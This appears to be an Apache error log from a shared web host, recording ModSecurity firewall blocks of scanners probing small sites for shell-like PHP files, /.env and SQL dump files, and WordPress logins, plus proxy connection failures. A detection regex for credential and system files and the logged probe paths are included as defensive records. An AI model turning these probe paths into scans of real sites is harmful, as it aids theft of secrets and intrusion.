[Tue May 26 19:21:59.421119 2026] [security2:error] [pid 37506:tid 37758] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/ups.php"] [unique_id "ahWlfwKctTPx5f8aOzkiNAAAAHo"]
[Tue May 26 19:21:59.663837 2026] [security2:error] [pid 37506:tid 37640] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlfwKctTPx5f8aOzkiLwAAAAQ"]
[Tue May 26 19:21:59.685671 2026] [security2:error] [pid 37506:tid 37738] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlfwKctTPx5f8aOzkiOwAAAGY"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1460507&moderation-hash=383c338c12fc424a1691f21077c966b7
[Tue May 26 19:21:59.783049 2026] [security2:error] [pid 37506:tid 37666] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/file5.php"] [unique_id "ahWlfwKctTPx5f8aOzkiRwAAAB4"]
[Tue May 26 19:21:59.783148 2026] [security2:error] [pid 37506:tid 37666] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/file5.php"] [unique_id "ahWlfwKctTPx5f8aOzkiRwAAAB4"]
[Tue May 26 19:22:00.144726 2026] [security2:error] [pid 37506:tid 37681] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/file.php"] [unique_id "ahWlgAKctTPx5f8aOzkiVAAAAC0"]
[Tue May 26 19:22:00.144849 2026] [security2:error] [pid 37506:tid 37681] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/file.php"] [unique_id "ahWlgAKctTPx5f8aOzkiVAAAAC0"]
[Tue May 26 19:22:00.513950 2026] [security2:error] [pid 37506:tid 37663] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/wp_filemanager.php"] [unique_id "ahWlgAKctTPx5f8aOzkiZAAAABs"]
[Tue May 26 19:22:00.514075 2026] [security2:error] [pid 37506:tid 37663] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/wp_filemanager.php"] [unique_id "ahWlgAKctTPx5f8aOzkiZAAAABs"]
[Tue May 26 19:22:00.875690 2026] [security2:error] [pid 37506:tid 37662] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/file18.php"] [unique_id "ahWlgAKctTPx5f8aOzkiawAAABo"]
[Tue May 26 19:22:00.875791 2026] [security2:error] [pid 37506:tid 37662] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/file18.php"] [unique_id "ahWlgAKctTPx5f8aOzkiawAAABo"]
[Tue May 26 19:22:01.239721 2026] [security2:error] [pid 37506:tid 37688] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/hplfuns.php"] [unique_id "ahWlgQKctTPx5f8aOzkifwAAADQ"]
[Tue May 26 19:22:01.239816 2026] [security2:error] [pid 37506:tid 37688] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/hplfuns.php"] [unique_id "ahWlgQKctTPx5f8aOzkifwAAADQ"]
[Tue May 26 19:22:02.497937 2026] [security2:error] [pid 37506:tid 37742] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlggKctTPx5f8aOzkipAAAAGo"]
[Tue May 26 19:22:02.601499 2026] [security2:error] [pid 37506:tid 37749] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlggKctTPx5f8aOzkisgAAAHE"], referer: https://anujtradingco.com
[Tue May 26 19:22:03.293001 2026] [security2:error] [pid 37506:tid 37660] [client 176.65.139.234:52996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "alphaelectronics.svijaykumar.in"] [uri "/.env"] [unique_id "ahWlgwKctTPx5f8aOzki1AAAABg"]
[Tue May 26 19:22:04.719059 2026] [security2:error] [pid 37506:tid 37652] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlhAKctTPx5f8aOzki9wAAABA"]
[Tue May 26 19:22:05.128994 2026] [security2:error] [pid 37506:tid 37542] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/database.sql"] [unique_id "ahWlhQKctTPx5f8aOzkjEgAAPiM"]
[Tue May 26 19:22:05.129235 2026] [security2:error] [pid 37506:tid 37523] [remote 94.76.235.103:36782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlhAKctTPx5f8aOzkjDgAATxA"]
[Tue May 26 19:22:05.416122 2026] [security2:error] [pid 37506:tid 37529] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/dump.sql"] [unique_id "ahWlhQKctTPx5f8aOzkjHgAAFRY"]
[Tue May 26 19:22:05.687926 2026] [security2:error] [pid 37506:tid 37528] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/backup.sql"] [unique_id "ahWlhQKctTPx5f8aOzkjIwAAFBU"]
[Tue May 26 19:22:05.972066 2026] [security2:error] [pid 37506:tid 37533] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/db.sql"] [unique_id "ahWlhQKctTPx5f8aOzkjLAAANBo"]
[Tue May 26 19:22:06.443085 2026] [security2:error] [pid 37506:tid 37704] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlhgKctTPx5f8aOzkjLwAAAEQ"]
[Tue May 26 19:22:07.544482 2026] [security2:error] [pid 37506:tid 37549] [remote 162.241.152.21:55818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWlhwKctTPx5f8aOzkjagAAMio"]
[Tue May 26 19:22:08.776529 2026] [security2:error] [pid 37506:tid 37557] [remote 162.241.152.21:55818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWliAKctTPx5f8aOzkjmgAANzI"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:22:09.222255 2026] [security2:error] [pid 37506:tid 37640] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWliAKctTPx5f8aOzkjoQAAAAQ"]
[Tue May 26 19:22:10.401934 2026] [security2:error] [pid 37506:tid 37676] [client 116.98.249.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWliQKctTPx5f8aOzkjzAAAACg"]
[Tue May 26 19:22:10.611300 2026] [security2:error] [pid 37506:tid 37566] [remote 66.116.199.98:42694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWligKctTPx5f8aOzkj3gAAfzs"]
[Tue May 26 19:22:11.104131 2026] [security2:error] [pid 37506:tid 37576] [remote 66.116.199.98:42694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWliwKctTPx5f8aOzkj9gAAbkU"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:22:11.735285 2026] [security2:error] [pid 37506:tid 37672] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWliwKctTPx5f8aOzkj_wAAACQ"]
[Tue May 26 19:22:12.187518 2026] [security2:error] [pid 37506:tid 37676] [client 114.119.138.207:21471] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWljAKctTPx5f8aOzkkHwAAACg"], referer: https://coinmedia.ru/premature-ejaculatin-and-ways-to-prolong-male-ejaculation/
[Tue May 26 19:22:13.647445 2026] [proxy:error] [pid 37506:tid 37747] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:13.647511 2026] [proxy_http:error] [pid 37506:tid 37747] [client 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:13.648127 2026] [proxy:error] [pid 37506:tid 37747] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:13.648160 2026] [proxy_http:error] [pid 37506:tid 37747] [client 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:13.675168 2026] [proxy:error] [pid 37506:tid 37597] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:13.675233 2026] [proxy_http:error] [pid 37506:tid 37597] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:13.676138 2026] [proxy:error] [pid 37506:tid 37597] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:13.676188 2026] [proxy_http:error] [pid 37506:tid 37597] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:13.708714 2026] [security2:error] [pid 37506:tid 37677] [client 51.68.236.94:27707] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahWljQKctTPx5f8aOzkkTwAAACk"]
[Tue May 26 19:22:13.708837 2026] [security2:error] [pid 37506:tid 37677] [client 51.68.236.94:27707] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahWljQKctTPx5f8aOzkkTwAAACk"]
[Tue May 26 19:22:14.246430 2026] [proxy:error] [pid 37506:tid 37596] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.246492 2026] [proxy_http:error] [pid 37506:tid 37596] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.247087 2026] [proxy:error] [pid 37506:tid 37596] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.247118 2026] [proxy_http:error] [pid 37506:tid 37596] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.345809 2026] [security2:error] [pid 37506:tid 37744] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWljQKctTPx5f8aOzkkUwAAAGw"]
[Tue May 26 19:22:14.440556 2026] [proxy:error] [pid 37506:tid 37569] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.440635 2026] [proxy_http:error] [pid 37506:tid 37569] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.441462 2026] [proxy:error] [pid 37506:tid 37569] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.441503 2026] [proxy_http:error] [pid 37506:tid 37569] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.668572 2026] [proxy:error] [pid 37506:tid 37587] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.668642 2026] [proxy_http:error] [pid 37506:tid 37587] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.669261 2026] [proxy:error] [pid 37506:tid 37587] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.669350 2026] [proxy_http:error] [pid 37506:tid 37587] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.771298 2026] [proxy:error] [pid 37506:tid 37622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.771356 2026] [proxy_http:error] [pid 37506:tid 37622] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:14.771941 2026] [proxy:error] [pid 37506:tid 37622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:14.771981 2026] [proxy_http:error] [pid 37506:tid 37622] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.009025 2026] [security2:error] [pid 37506:tid 37656] [client 103.104.20.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahWljgKctTPx5f8aOzkkXQAAABQ"]
[Tue May 26 19:22:15.009839 2026] [proxy:error] [pid 37506:tid 37601] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.009932 2026] [proxy_http:error] [pid 37506:tid 37601] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.010561 2026] [proxy:error] [pid 37506:tid 37601] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.010645 2026] [proxy_http:error] [pid 37506:tid 37601] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.017273 2026] [proxy:error] [pid 37506:tid 37610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.017347 2026] [proxy_http:error] [pid 37506:tid 37610] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.017989 2026] [proxy:error] [pid 37506:tid 37610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.018059 2026] [proxy_http:error] [pid 37506:tid 37610] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.022161 2026] [proxy:error] [pid 37506:tid 37584] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.022210 2026] [proxy_http:error] [pid 37506:tid 37584] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.022797 2026] [proxy:error] [pid 37506:tid 37584] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.022831 2026] [proxy_http:error] [pid 37506:tid 37584] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.023046 2026] [proxy:error] [pid 37506:tid 37562] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.023120 2026] [proxy_http:error] [pid 37506:tid 37562] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.023802 2026] [proxy:error] [pid 37506:tid 37562] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.023868 2026] [proxy_http:error] [pid 37506:tid 37562] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.024503 2026] [proxy:error] [pid 37506:tid 37595] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.024540 2026] [proxy_http:error] [pid 37506:tid 37595] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.025110 2026] [proxy:error] [pid 37506:tid 37595] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.025142 2026] [proxy_http:error] [pid 37506:tid 37595] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.026498 2026] [proxy:error] [pid 37506:tid 37624] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.026571 2026] [proxy_http:error] [pid 37506:tid 37624] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.027223 2026] [proxy:error] [pid 37506:tid 37624] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.027291 2026] [proxy_http:error] [pid 37506:tid 37624] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.073019 2026] [proxy:error] [pid 37506:tid 37586] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.073068 2026] [proxy_http:error] [pid 37506:tid 37586] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.073646 2026] [proxy:error] [pid 37506:tid 37586] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.073679 2026] [proxy_http:error] [pid 37506:tid 37586] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.075777 2026] [proxy:error] [pid 37506:tid 37623] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.075832 2026] [proxy_http:error] [pid 37506:tid 37623] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.076407 2026] [proxy:error] [pid 37506:tid 37623] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.076441 2026] [proxy_http:error] [pid 37506:tid 37623] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.077495 2026] [proxy:error] [pid 37506:tid 37589] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.077568 2026] [proxy_http:error] [pid 37506:tid 37589] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.078218 2026] [proxy:error] [pid 37506:tid 37589] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:22:15.078288 2026] [proxy_http:error] [pid 37506:tid 37589] [remote 2a0e:97c0:3ea:6d::1:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:22:15.768472 2026] [security2:error] [pid 37506:tid 37671] [client 168.119.123.75:10788] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWljwKctTPx5f8aOzkkmAAAACM"], referer: https://thegoodsporting.com
[Tue May 26 19:22:15.837746 2026] [security2:error] [pid 37506:tid 37746] [client 103.104.20.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahWljwKctTPx5f8aOzkkmwAAAG4"]
